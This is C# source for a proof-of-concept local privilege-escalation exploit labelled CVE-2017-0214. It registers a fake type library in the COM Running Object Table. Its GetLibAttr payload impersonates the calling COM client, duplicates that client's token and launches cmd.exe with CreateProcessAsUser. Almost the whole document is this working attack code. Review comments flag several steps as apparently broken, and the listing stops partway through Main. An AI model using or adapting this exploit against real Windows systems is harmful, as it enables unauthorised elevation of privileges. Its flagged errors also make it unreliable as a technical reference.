CVE-2017-0214Poc

using Microsoft.Win32.SafeHandles;
using MSSITLB;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Runtime.Versioning;
using System.Security;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
using IS = System.Runtime.InteropServices;

namespace PoC_RotRegistrationEoP
{
    /// <summary>
    /// Helper for attributing an in-flight COM/RPC call to the local process
    /// that made it. Used by the wrappers below purely for logging; the value
    /// is informational and is not used for any access decision.
    /// </summary>
    static class Utils
    {
        // rpcrt4!I_RpcBindingInqLocalClientPID is an undocumented export.
        // Presumably a null binding handle means "the call this thread is
        // currently servicing"; 0 (RPC_S_OK) signals success.
        [IS.DllImport("rpcrt4.dll")]
        static extern int I_RpcBindingInqLocalClientPID(IntPtr ClientBinding, out int ClientPID);

        /// <summary>
        /// Returns the PID of the local client whose call is being serviced on
        /// the current thread, or -1 when the RPC runtime reports an error
        /// (e.g. no call is in progress).
        /// </summary>
        public static int GetRpcPid()
        {
            int callerPid;
            int status = I_RpcBindingInqLocalClientPID(IntPtr.Zero, out callerPid);
            return status == 0 ? callerPid : -1;
        }
    }

    /// <summary>
    /// Pass-through ITypeInfo/ITypeInfo2 implementation. Every call is logged
    /// as "&lt;caller pid&gt; - &lt;method&gt;" and then forwarded to the real type
    /// info it wraps. Results that are themselves type infos or type libraries
    /// are re-wrapped so that follow-on calls from the client keep flowing
    /// through (and being logged by) this process.
    /// </summary>
    [IS.ComVisible(true)]
    class TypeInfoWrapper : ITypeInfo2, ITypeInfo
    {
        // The genuine type info that services every forwarded call.
        private readonly ITypeInfo2 _inner;

        public TypeInfoWrapper(ITypeInfo2 type_info)
        {
            _inner = type_info;
        }

        // Convenience overload; the wrapped object must also implement ITypeInfo2
        // (the cast throws InvalidCastException otherwise).
        public TypeInfoWrapper(ITypeInfo type_info)
            : this((ITypeInfo2)type_info)
        {
        }

        // Writes one trace line: the PID of the COM client currently calling
        // in (see Utils.GetRpcPid) and the name of the method being serviced.
        private static void LogCall(MethodBase method)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), method.Name);
        }

        public void AddressOfMember(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out IntPtr ppv)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.AddressOfMember(memid, invKind, out ppv);
        }

        public void CreateInstance(object pUnkOuter, ref Guid riid, out object ppvObj)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.CreateInstance(pUnkOuter, ref riid, out ppvObj);
        }

        public void GetAllCustData(IntPtr pCustData)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetAllCustData(pCustData);
        }

        public void GetAllFuncCustData(int index, IntPtr pCustData)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetAllFuncCustData(index, pCustData);
        }

        public void GetAllImplTypeCustData(int index, IntPtr pCustData)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetAllImplTypeCustData(index, pCustData);
        }

        public void GetAllParamCustData(int indexFunc, int indexParam, IntPtr pCustData)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetAllParamCustData(indexFunc, indexParam, pCustData);
        }

        public void GetAllVarCustData(int index, IntPtr pCustData)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetAllVarCustData(index, pCustData);
        }

        // The containing library is handed back wrapped so the client's next
        // calls on it are also intercepted.
        public void GetContainingTypeLib(out ITypeLib ppTLB, out int pIndex)
        {
            LogCall(MethodBase.GetCurrentMethod());
            ITypeLib realLib;
            _inner.GetContainingTypeLib(out realLib, out pIndex);
            ppTLB = new TypeLibWrapper(realLib);
        }

        public void GetCustData(ref Guid guid, out object pVarVal)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetCustData(ref guid, out pVarVal);
        }

        public void GetDllEntry(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, IntPtr pBstrDllName, IntPtr pBstrName, IntPtr pwOrdinal)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetDllEntry(memid, invKind, pBstrDllName, pBstrName, pwOrdinal);
        }

        public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
        }

        public void GetDocumentation2(int memid, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetDocumentation2(memid, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
        }

        public void GetFuncCustData(int index, ref Guid guid, out object pVarVal)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetFuncCustData(index, ref guid, out pVarVal);
        }

        public void GetFuncDesc(int index, out IntPtr ppFuncDesc)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetFuncDesc(index, out ppFuncDesc);
        }

        public void GetFuncIndexOfMemId(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out int pFuncIndex)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetFuncIndexOfMemId(memid, invKind, out pFuncIndex);
        }

        public void GetIDsOfNames(string[] rgszNames, int cNames, int[] pMemId)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetIDsOfNames(rgszNames, cNames, pMemId);
        }

        public void GetImplTypeCustData(int index, ref Guid guid, out object pVarVal)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetImplTypeCustData(index, ref guid, out pVarVal);
        }

        public void GetImplTypeFlags(int index, out System.Runtime.InteropServices.ComTypes.IMPLTYPEFLAGS pImplTypeFlags)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetImplTypeFlags(index, out pImplTypeFlags);
        }

        public void GetMops(int memid, out string pBstrMops)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetMops(memid, out pBstrMops);
        }

        public void GetNames(int memid, string[] rgBstrNames, int cMaxNames, out int pcNames)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetNames(memid, rgBstrNames, cMaxNames, out pcNames);
        }

        public void GetParamCustData(int indexFunc, int indexParam, ref Guid guid, out object pVarVal)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetParamCustData(indexFunc, indexParam, ref guid, out pVarVal);
        }

        // Referenced type infos are wrapped for the same reason as in
        // GetContainingTypeLib.
        public void GetRefTypeInfo(int hRef, out ITypeInfo ppTI)
        {
            LogCall(MethodBase.GetCurrentMethod());
            ITypeInfo realInfo;
            _inner.GetRefTypeInfo(hRef, out realInfo);
            ppTI = new TypeInfoWrapper(realInfo);
        }

        public void GetRefTypeOfImplType(int index, out int href)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetRefTypeOfImplType(index, out href);
        }

        public void GetTypeAttr(out IntPtr ppTypeAttr)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetTypeAttr(out ppTypeAttr);
        }

        public void GetTypeComp(out ITypeComp ppTComp)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetTypeComp(out ppTComp);
        }

        public void GetTypeFlags(out int pTypeFlags)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetTypeFlags(out pTypeFlags);
        }

        public void GetTypeKind(out System.Runtime.InteropServices.ComTypes.TYPEKIND pTypeKind)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetTypeKind(out pTypeKind);
        }

        public void GetVarCustData(int index, ref Guid guid, out object pVarVal)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetVarCustData(index, ref guid, out pVarVal);
        }

        public void GetVarDesc(int index, out IntPtr ppVarDesc)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetVarDesc(index, out ppVarDesc);
        }

        public void GetVarIndexOfMemId(int memid, out int pVarIndex)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.GetVarIndexOfMemId(memid, out pVarIndex);
        }

        public void Invoke(object pvInstance, int memid, short wFlags, ref System.Runtime.InteropServices.ComTypes.DISPPARAMS pDispParams, IntPtr pVarResult, IntPtr pExcepInfo, out int puArgErr)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.Invoke(pvInstance, memid, wFlags, ref pDispParams, pVarResult, pExcepInfo, out puArgErr);
        }

        public void ReleaseFuncDesc(IntPtr pFuncDesc)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.ReleaseFuncDesc(pFuncDesc);
        }

        public void ReleaseTypeAttr(IntPtr pTypeAttr)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.ReleaseTypeAttr(pTypeAttr);
        }

        public void ReleaseVarDesc(IntPtr pVarDesc)
        {
            LogCall(MethodBase.GetCurrentMethod());
            _inner.ReleaseVarDesc(pVarDesc);
        }
    }
  
    /// <summary>
    /// Managed mirror of the Win32 PROCESS_INFORMATION structure: two handles
    /// followed by two ids, laid out sequentially for P/Invoke.
    /// </summary>
    /// <remarks>
    /// Raw IntPtr handles are used instead of SafeHandle because the marshaller
    /// does not support [out] SafeHandles inside structures/classes. Nothing
    /// here closes hProcess/hThread; whoever fills the structure owns them.
    /// NOTE(review): no code in this listing references this class —
    /// TypeLibWrapper declares its own ProcessInformation struct for
    /// CreateProcessAsUser — so it appears to be dead code.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal class PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }
    /// <summary>
    /// Out-of-process ITypeLib2/ITypeLib implementation that forwards every
    /// call to a real type library (<see cref="_tlb"/>) while logging the PID of
    /// the COM client making the call. Program.Main registers an instance of
    /// this class in the Running Object Table under a file moniker, so any
    /// client that resolves that moniker ends up calling into this process.
    /// The exploit payload lives in <see cref="GetLibAttr"/>.
    /// </summary>
    [IS.ComVisible(true)]
    class TypeLibWrapper : ITypeLib2, ITypeLib
    {
        // ole32!CoGetCallContext: returns the call-context interface (here
        // IServerSecurity) for the COM call currently being serviced on this
        // thread. PreserveSig=false turns a failing HRESULT into an exception.
        [DllImport("ole32.dll", ExactSpelling = true, PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.Interface)]
        static extern object CoGetCallContext([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);

        // IID_IServerSecurity. Duplicates the Guid attribute on the
        // IServerSecurity interface declared later in this file.
        Guid gd=new Guid("{0000013E-0000-0000-C000-000000000046}");
        // The genuine type library every ITypeLib/ITypeLib2 call is forwarded to.
        private ITypeLib2 _tlb;

        public TypeLibWrapper(ITypeLib2 tlb)
        {
            _tlb = tlb;
        }

        // Convenience overload; the wrapped object must also implement ITypeLib2
        // (the cast throws InvalidCastException otherwise).
        public TypeLibWrapper(ITypeLib tlb)
            : this((ITypeLib2)tlb)
        {
        }


        // oleaut32!LoadTypeLib. PreserveSig=false: a failing HRESULT becomes an
        // exception rather than a return code.
        [IS.DllImport("oleaut32.dll", CharSet = IS.CharSet.Unicode, PreserveSig = false)]
        static extern ITypeLib LoadTypeLib(string strTypeLibName);

        // Loads the type library at typelibname and wraps it.
        // NOTE(review): the try/catch only rethrows, and `a` is never read;
        // both are leftovers that can be removed without changing behavior.
        public TypeLibWrapper(string typelibname)
            
        {
            try
            {
                _tlb = (ITypeLib2)LoadTypeLib(typelibname);
                int a = 0;
            }
            catch (Exception)
            {
                
                throw;
            }
            
        }

        // NOTE(review): unlike TypeInfoWrapper, type infos returned through
        // ppTInfo here are NOT re-wrapped, so follow-on calls on them bypass the
        // logging in this process.
        public void FindName(string szNameBuf, int lHashVal, ITypeInfo[] ppTInfo, int[] rgMemId, ref short pcFound)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.FindName(szNameBuf, lHashVal, ppTInfo, rgMemId, ref pcFound);
        }

        public void GetAllCustData(IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetAllCustData(pCustData);
        }

        public void GetCustData(ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetCustData(ref guid, out pVarVal);
        }

        public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
        }

        public void GetDocumentation2(int index, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetDocumentation2(index, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
        }
        // --- Win32 token / process-creation imports used by the payload ---
        internal const String ADVAPI32 = "advapi32.dll";
        internal const String KERNEL32 = "kernel32.dll";
        // advapi32!OpenThreadToken, renamed. Opens the token of the given
        // thread; with OpenAsSelf=true the open is checked against the process
        // token rather than the (possibly impersonated) thread token.
        [DllImport(ADVAPI32, SetLastError = true, EntryPoint = "OpenThreadToken")]
        [ResourceExposure(ResourceScope.None)]
        internal static extern bool
        OpenCurrentThreadToken(
            [In] IntPtr ThreadHandle,
            [In] TokenAccessLevels DesiredAccess,
            [In] bool OpenAsSelf,
            [Out] out IntPtr TokenHandle);
        // kernel32!GetCurrentThread returns a pseudo-handle; it need not be closed.
        [DllImport(KERNEL32, SetLastError = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern IntPtr
        GetCurrentThread();
        // Mirrors the Win32 SECURITY_IMPERSONATION_LEVEL enumeration.
        internal enum SECURITY_IMPERSONATION_LEVEL
        {
            Anonymous = 0,
            Identification = 1,
            Impersonation = 2,
            Delegation = 3,
        }
        // Mirrors the Win32 TOKEN_TYPE enumeration.
        [Serializable]
        internal enum TokenTypeVal : int
        {
            TokenPrimary = 1,
            TokenImpersonation
        }
        // advapi32!DuplicateTokenEx: copies ExistingTokenHandle into a new token
        // of the requested type/level. DuplicateTokenHandle is declared ref
        // rather than out, so the caller must pre-initialise it.
        [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
        [DllImport(ADVAPI32, CharSet = CharSet.Auto, SetLastError = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern
        bool DuplicateTokenEx(
            [In]     IntPtr ExistingTokenHandle,
            [In]     TokenAccessLevels DesiredAccess,
            [In]     IntPtr TokenAttributes,
            [In]     SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
            [In]     TokenTypeVal TokenType,
            [In, Out] ref IntPtr DuplicateTokenHandle);
       
       
        // advapi32!CreateProcessAsUser. SuppressUnmanagedCodeSecurity skips the
        // CAS stack walk on every call; harmless in a full-trust console app.
        [DllImport(ADVAPI32, CharSet = System.Runtime.InteropServices.CharSet.Auto, SetLastError = true, BestFitMapping = false)]
        [System.Security.SuppressUnmanagedCodeSecurityAttribute()]
        [ResourceExposure(ResourceScope.Machine)]
        public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SecurityAttributes lpProcessAttributes,
             ref SecurityAttributes lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
             String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation);


        // Managed STARTUPINFO; cb must be set to Marshal.SizeOf before use.
        [StructLayout(LayoutKind.Sequential)]
        public struct StartupInfo
        {
            public int cb;
            public String lpReserved;
            public String lpDesktop;
            public String lpTitle;
            public uint dwX;
            public uint dwY;
            public uint dwXSize;
            public uint dwYSize;
            public uint dwXCountChars;
            public uint dwYCountChars;
            public uint dwFillAttribute;
            public uint dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        // Managed PROCESS_INFORMATION (a second copy; see the class-level
        // PROCESS_INFORMATION above, which is unused).
        [StructLayout(LayoutKind.Sequential)]
        public struct ProcessInformation
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public uint dwProcessId;
            public uint dwThreadId;
        }

        // Managed SECURITY_ATTRIBUTES; Length must be set to Marshal.SizeOf.
        [StructLayout(LayoutKind.Sequential)]
        public struct SecurityAttributes
        {
            public int Length;
            public IntPtr lpSecurityDescriptor;
            public bool bInheritHandle;
        }
        // ole32!CoQueryClientBlanket. NOTE(review): the native signature is
        // (DWORD*, DWORD*, OLECHAR**, DWORD*, DWORD*, RPC_AUTHZ_HANDLE*, DWORD*)
        // and the returned principal name must be freed with CoTaskMemFree;
        // `out StringBuilder` marshalled as LPWStr is not a valid [out] target,
        // so this declaration presumably fails at call time — verify.
        [DllImport("ole32.dll")]
        static extern int CoQueryClientBlanket(out IntPtr pAuthnSvc, out IntPtr pAuthzSvc,
            [MarshalAs(UnmanagedType.LPWStr)] out StringBuilder pServerPrincName, out IntPtr
            pAuthnLevel, out IntPtr pImpLevel, out IntPtr pPrivs, out IntPtr pCapabilities);
        // Payload. Presumably chosen because a type-library consumer calls
        // GetLibAttr early after loading — confirm against the target loader.
        // Sequence: spawn cmd.exe, query the client's security blanket, open
        // the thread token before and after IServerSecurity::ImpersonateClient,
        // duplicate the post-impersonation token into a primary token, call
        // CreateProcessAsUser, then forward to the real type library.
        //
        // NOTE(review): several steps look wrong and should be checked before
        // trusting any result from this PoC:
        //  - The Process.Start at the top runs BEFORE ImpersonateClient, i.e.
        //    with whatever token this thread already holds, not the client's.
        //  - Both OpenThreadToken calls request only TokenAccessLevels.Query;
        //    DuplicateTokenEx needs TOKEN_DUPLICATE on the source handle.
        //  - DuplicateTokenEx asks for SECURITY_IMPERSONATION_LEVEL.Identification;
        //    an identification-level token cannot be used to run code as the
        //    client, and the level actually obtainable is capped by the
        //    client's own blanket, not by anything this process sets.
        //  - CreateProcessAsUser is given tokenHandle2 (the impersonation
        //    token) instead of hToken2 (the duplicated primary token); hToken2
        //    is never used after DuplicateTokenEx, and the "DuplicateTokenEx:"
        //    line prints tokenHandle rather than hToken2.
        //  - lpApplicationName is the relative "cmd.exe"; CreateProcessAsUser
        //    does not search PATH for lpApplicationName.
        //  - The results of ImpersonateClient (`a`), OpenThreadToken and
        //    DuplicateTokenEx (`isSuccess`) are never checked, `s` is unused,
        //    RevertToSelf is never called (the thread is still impersonating
        //    when it forwards to _tlb.GetLibAttr), and none of the token or
        //    process handles are closed.
        public void GetLibAttr(out IntPtr ppTLibAttr)
        {
            System.Diagnostics.Process.Start(@"C:\Windows\System32\cmd.exe");
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            Console.WriteLine("firstShoot");
            IntPtr threadPtr1=IntPtr.Zero;
            IntPtr threadPtr23=IntPtr.Zero;
            IntPtr threadPtr3=IntPtr.Zero;
            IntPtr threadPtr4=IntPtr.Zero;
            IntPtr threadPtr5=IntPtr.Zero;
            IntPtr threadPtr6=IntPtr.Zero;
            StringBuilder sb = new StringBuilder();
            CoQueryClientBlanket(out threadPtr1, out  threadPtr23,out sb, out threadPtr3, out threadPtr4, out threadPtr5, out threadPtr6);
            string s = sb.ToString();
            // Thread token before impersonation (for comparison in the log).
            IntPtr tokenHandle = IntPtr.Zero;
            IntPtr threadPtr = GetCurrentThread();
            bool isSuccess = OpenCurrentThreadToken(threadPtr, TokenAccessLevels.Query, true, out tokenHandle);
            Console.WriteLine("threadPtr1is:" + tokenHandle);
            // Ask COM for the caller's IServerSecurity and impersonate the
            // calling client on this thread. The level granted is whatever the
            // client's proxy blanket allows.
            IServerSecurity pss = CoGetCallContext(gd) as IServerSecurity;
            int a = pss.ImpersonateClient();
            // Thread token after impersonation: this is the client's token.
            IntPtr tokenHandle2 = IntPtr.Zero;
            IntPtr threadPtr2 = GetCurrentThread();
             isSuccess = OpenCurrentThreadToken(threadPtr2, TokenAccessLevels.Query, true, out tokenHandle2);
            Console.WriteLine("threadPtr2is:" + tokenHandle2);
            IntPtr hToken2 = IntPtr.Zero;
            var sa = new SecurityAttributes { bInheritHandle = false };
            sa.Length = Marshal.SizeOf(sa);
            isSuccess = DuplicateTokenEx(tokenHandle2, TokenAccessLevels.MaximumAllowed, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Identification, TokenTypeVal.TokenPrimary, ref hToken2);
            Console.WriteLine("DuplicateTokenEx:" + tokenHandle + "err:" + Marshal.GetLastWin32Error());
          
				sa.lpSecurityDescriptor = (IntPtr)0;
            var si = new StartupInfo();
				si.cb = Marshal.SizeOf(si);
				si.lpDesktop = "";

				// ReSharper disable once RedundantAssignment
				var pi = new ProcessInformation();
                isSuccess = CreateProcessAsUser(tokenHandle2, "cmd.exe", @"C:\Windows\System32\cmd.exe", ref sa, ref sa, false, 0, (IntPtr)0, "C:\\", ref si, out pi);

            Console.WriteLine("CreateProcessAsUser:" + isSuccess);
            
            //IntPtr pwz = IntPtr.Zero;
            //IntPtr pwz2 = IntPtr.Zero;
            //pss.QueryBlanket(IntPtr.Zero, IntPtr.Zero, pwz, IntPtr.Zero, IntPtr.Zero, pwz2, IntPtr.Zero);
            //string s = Marshal.PtrToStringAuto(pwz);
            //string s2 = Marshal.PtrToStringAuto(pwz2);
            //System.Diagnostics.Process p = new System.Diagnostics.Process();
            //p.StartInfo.FileName = @"cmd.exe";
            //p.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
            //p.Start(); // start the program
            //p.WaitForExit();
            
            // Forward to the real library so the client sees a valid answer.
            _tlb.GetLibAttr(out ppTLibAttr);
            return;
        }

        public void GetLibStatistics(IntPtr pcUniqueNames, out int pcchUniqueNames)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetLibStatistics(pcUniqueNames, out pcchUniqueNames);
        }

        public void GetTypeComp(out ITypeComp ppTComp)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetTypeComp(out ppTComp);
        }

        // Type infos are handed back wrapped so the client's follow-on calls
        // are also routed through (and logged by) this process.
        public void GetTypeInfo(int index, out ITypeInfo ppTI)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _tlb.GetTypeInfo(index, out type_info);
            ppTI = new TypeInfoWrapper(type_info);
        }

        public int GetTypeInfoCount()
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            return _tlb.GetTypeInfoCount();
        }

        // Same re-wrapping as GetTypeInfo.
        public void GetTypeInfoOfGuid(ref Guid guid, out ITypeInfo ppTInfo)
        {
          
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _tlb.GetTypeInfoOfGuid(ref guid, out type_info);
            ppTInfo = new TypeInfoWrapper(type_info);
        }

        public void GetTypeInfoType(int index, out System.Runtime.InteropServices.ComTypes.TYPEKIND pTKind)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetTypeInfoType(index, out pTKind);
        }

        public bool IsName(string szNameBuf, int lHashVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            return _tlb.IsName(szNameBuf, lHashVal);
        }

        public void ReleaseTLibAttr(IntPtr pTLibAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.ReleaseTLibAttr(pTLibAttr);
        }
    }
    /// <summary>
    /// Marker for the COM coclass {26D6311A-A724-4C8C-B83A-2E60ECD47480}.
    /// [ComImport] means the object is implemented by an externally registered
    /// COM server, so the body is intentionally empty. Program.Main activates
    /// the same CLSID via Type.GetTypeFromCLSID in "-x" mode; the direct
    /// `new mytestcom()` path is commented out there.
    /// </summary>
    [ComImport, Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")]
    public class mytestcom
    {
    }


    /// <summary>
    /// COM interface {E80A6EC1-39FB-462A-A56C-411EE9FC1AEB} exposed by the
    /// mytestcom server. No InterfaceType attribute is given, so the runtime
    /// default (dual) layout applies. Only referenced from commented-out code
    /// in this listing.
    /// </summary>
    [ComImport, Guid("E80A6EC1-39FB-462A-A56C-411EE9FC1AEB")]
    public interface Imytestcom
    {
        // Single method; its effect on the server side is not visible here.
        void mdtest();
    }

    /// <summary>
    /// Managed view of ole32's IServerSecurity (IID {0000013E-...}), obtained
    /// through CoGetCallContext while a COM call is being serviced. The method
    /// order is the COM vtable order and must not change.
    /// </summary>
    /// <remarks>
    /// QueryBlanket takes raw pointers for every out-parameter; callers pass
    /// IntPtr.Zero for values they do not want. ImpersonateClient and
    /// RevertToSelf return the raw HRESULT (PreserveSig) instead of throwing,
    /// so callers must check it themselves.
    /// </remarks>
    [ComImport]
    [Guid("0000013E-0000-0000-C000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    internal interface IServerSecurity
    {
        void QueryBlanket(IntPtr authnSvc, IntPtr authzSvc, IntPtr serverPrincipalName, IntPtr authnLevel, IntPtr impLevel, IntPtr clientPrincipalName, IntPtr Capabilities);

        // Switches the calling thread to the client's token; level is bounded
        // by the client's proxy blanket.
        [PreserveSig]
        int ImpersonateClient();

        // Undoes ImpersonateClient for the calling thread.
        [PreserveSig]
        int RevertToSelf();

        [PreserveSig]
        [return: MarshalAs(UnmanagedType.Bool)]
        bool IsImpersonating();
    }
    /// <summary>
    /// PoC driver. With no arguments it prints usage. With "-x" it plays the
    /// trigger role: activate the COM class whose CLSID mytestcom declares.
    /// Otherwise it plays the server role: initialise COM security for this
    /// process, register a TypeLibWrapper in the Running Object Table under a
    /// file moniker for tlb_path, hold a byte-range lock on that file, and
    /// repeatedly spawn itself with "-x". Presumably the activated object loads
    /// the type library at tlb_path and that load is what resolves to the ROT
    /// entry (and so to TypeLibWrapper.GetLibAttr in this process).
    /// NOTE(review): the resolution path and the reason for the file lock are
    /// not visible in this listing — check the CVE-2017-0214 write-up (page
    /// title) before relying on the description above.
    /// </summary>
    class Program
    {
        const String OLEAUT32 = "oleaut32.dll";

        // oleaut32!LoadRegTypeLib. Only referenced from commented-out code.
        [DllImport(OLEAUT32,
         ExactSpelling = true,
         CharSet = CharSet.Unicode,
         PreserveSig = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern int LoadRegTypeLib(ref Guid rguid, ushort major, ushort minor, int lcid,
             [MarshalAs(UnmanagedType.Interface)] out object typeLib);

        // CoInitializeSecurity constants (values from objbase.h).
        const int RPC_C_AUTHN_LEVEL_DEFAULT = 0;
        const int RPC_C_IMP_LEVEL_IMPERSONATE = 3;
        const int EOAC_APPID = 8;

        // ole32!CoInitializeSecurity. pSecDesc is declared as a Guid because
        // this file always calls it with EOAC_APPID, where that parameter is an
        // AppID rather than a security descriptor.
        [IS.DllImport("ole32.dll")]
        static extern int CoInitializeSecurity(
            ref Guid pSecDesc,
            int cAuthSvc,
            IntPtr asAuthSvc,
            IntPtr pReserved1,
            int dwAuthnLevel,
            int dwImpLevel,
            IntPtr pAuthList,
            int dwCapabilities,
            IntPtr pReserved3
            );

        // ole32!CreateFileMoniker; PreserveSig=false throws on failure.
        [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
        [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        static extern IMoniker CreateFileMoniker(string lpszPathName);

        // ole32!GetRunningObjectTable; PreserveSig=false throws on failure.
        [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
        [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        static extern IRunningObjectTable GetRunningObjectTable(int reserved);

        // IRunningObjectTable::Register flags (objidl.h). ALLOWANYCLIENT lets
        // clients from other security contexts resolve the entry;
        // REGISTRATIONKEEPSALIVE keeps the object referenced by the ROT.
        const int ROTFLAGS_ALLOWANYCLIENT = 2;
        const int ROTFLAGS_REGISTRATIONKEEPSALIVE = 1;
        // LIBID of tapi3; only referenced from commented-out code.
        static Guid tapi3guid = new Guid("{21D6D480-A88B-11D0-83DD-00AA003CCABD}");
        // MTA so the ROT-registered object can be serviced on COM RPC threads
        // without this thread pumping messages (it blocks in ReadKey below).
        [MTAThread]
        static void Main(string[] args)
        {
           
            try
            {
              // (new mytestcom() as Imytestcom).mdtest();
                //byte[] bs = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll"));

              //  File.WriteAllBytes("c:\\123\\1.raw",bs);
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: fake_typelib|-x");
                    return;
                }

                if (args[0] == "-x")
                {
                    // Trigger role (run as a child of the server role below):
                    // CoCreateInstance the CLSID declared by mytestcom. What that
                    // server does with its type library is not visible here.
                    //Console.WriteLine("Running PoC");
                    //Type t = Type.GetTypeFromCLSID(new Guid("9E175B68-F52A-11D8-B9A5-505054503030"));
                    //IGatherManagerAdmin2 mgr = (IGatherManagerAdmin2)Activator.CreateInstance(t);
                    //mgr.GetBackoffReason(0x12345678);

